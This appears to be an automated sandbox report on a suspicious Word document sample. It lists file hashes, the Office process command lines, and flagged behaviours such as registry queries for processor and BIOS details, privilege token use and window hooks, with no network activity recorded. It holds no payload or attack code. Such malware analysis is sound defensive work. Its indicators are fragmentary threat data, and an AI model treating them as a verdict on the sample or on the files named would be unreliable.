SHA512 974510e1dfeb12b2835e5fb8289f382f3b46481517077bbfc02282cd4e96b065b7add05869b488e4a2c4dc9467d6fc2106e7bc7e9a942bd5565df695fb098b3b

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

MD5 c28741851ecc1e35f9f0a6d3f4d1754d
SHA1 a3c20b98f76dd9eaf8ccb9dd81996cc6f3aeb157
SHA256 e1b73d684c063bfcd8bdf7d403f0251acc84717dc63aa2e0005b4b87113f7f47
SHA512 d0933d0ecb006ae10729f07614459585690c2b10b3f4d5ea04d80cafbbd70792c495770a9b779202f7c958476a765107c629ff3d626b5196f0bbf8620256b9e1

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

MD5 f2d4cdbed5decab87fff69b92c97dd34
SHA1 16c2bc09d3e53b69a0d260a103151485bb2de6c1
SHA256 eb59f6e7d80085d8274ff58ef8b3e3e1222e7e3ee84ba593c037d33c858c0cd8
SHA512 e119ea1b46e24a6aca15e28162b6faf2ced92365a3fb811bcbaaeb50c2a9de3eea5f0688a1044f26a5fcbeaaec86f9717acb03d13f9ad5f099caecebc1847218

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{51EA5863-5FCC-48B4-A95D-601C577EBDEE}.FSD

MD5 f7c8295ebe306ddac34ad8dc3bb09b84
SHA1 3ed6a8e183c09de346e3ea54f1b1b1b09fe1938e
SHA256 765109674aa0e49a59b25b5612ddce420fd3554920a2723ce4789afbb8f9c043
SHA512 4ac0050cd65e405f4335706bd0b2a03e677a2f405f2fbe0b3297f2cd7bdd45c5b0f5a8bfe48d9cdd87d345381b20490f3cdf38c26afecf62c5d2b2f1d28e6da1

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

MD5 2a057c3a13f7ccab1e31a7a727defdf6
SHA1 341c8f3b35cc09be1d1fc0d2cff1470d7abbd117
SHA256 66be60a530d245ff71d9e13c25eb529187cf89e8fb99fd527c5d5e6e6484316e
SHA512 87ac4a130a67724b0481d65c953b9a2593301438f80bd29d0186b399c22756616c161656533596d494c2a080f4ef4156d5f7d8847edb396e89347a1422021ad3

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-22 13:33

Reported

2024-07-22 13:40

Platform

win10v2004-20240709-en

Max time kernel

144s

Max time network

127s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\635e0b3decdc6bd51760fddf495b9527_JaffaCakes118.doc" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A (2 events)
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A (3 events)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A (3 events)
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A (2 events)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A (3 events)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A (2 events)

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A (3 events)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A (2 events)
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A (3 events)
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A (2 events)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A (3 events)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A (2 events)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeAuditPrivilege N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A (3 events)

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A (17 events)
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A (12 events)

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\635e0b3decdc6bd51760fddf495b9527_JaffaCakes118.doc" /o ""

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding

Network


Files
